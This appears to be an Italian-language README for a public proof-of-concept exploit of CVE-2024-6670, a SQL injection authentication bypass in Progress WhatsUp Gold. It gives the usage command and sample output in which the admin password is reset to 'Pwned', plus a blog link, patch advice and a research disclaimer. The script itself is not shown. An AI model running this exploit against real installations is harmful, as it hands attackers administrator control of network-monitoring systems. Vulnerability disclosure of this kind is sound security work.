
Exploit proof-of-concept per l'SQL injection di Progress WhatsUp Gold che bypassa l'autenticazione (CVE-2024-6670). Include analisi della causa principale e reset automatico della password per ottenere accesso admin.
PoC per la vulnerabilità di bypass dell'autenticazione tramite SQL injection in Progress Software WhatsUp Gold HasErrors (CVE-2024-6670)
Un'analisi delle cause alla radice della vulnerabilità è disponibile sul mio blog:
https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/
python CVE-2024-6670.py --newpassword Pwned --target-url https://192.168.201.150
_______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______
|______ | | | | | | | | | | | \ | | | \ | | ____ | |______ |_____| | | |
______| |_____| | | | | | | |_____| | \_| __|__ | \_| |_____| . | |______ | | | | |
(*) Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670)
(*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam), shoutout to @indishell1046
(*) Technical details: https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/
[^_^] Starting the exploit...
[*] Used remote primitive to encrypt our passowrd
[*] encrypted password extracted -> 0x03000000100000000EABC7F4B1C8263DADB17E4BED835C0F
[+] Exploit finished, you can now login using the username -> admin and password -> Pwned
Aggiornare all'ultima versione o mitigare seguendo le istruzioni contenute nell'avviso di Progress
Se non fosse stato per la motivazione e gli insegnamenti che il mio caro amico Manish mi ha trasmesso negli anni in cui lo conosco, non sarei riuscito a sfruttare questa vulnerabilità, grazie amico mio.
Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di efficaci tecniche difensive, e non è destinato a essere utilizzato per attaccare sistemi se non esplicitamente autorizzati. I maintainer del progetto non sono responsabili dell'uso improprio del software. Usalo in modo responsabile.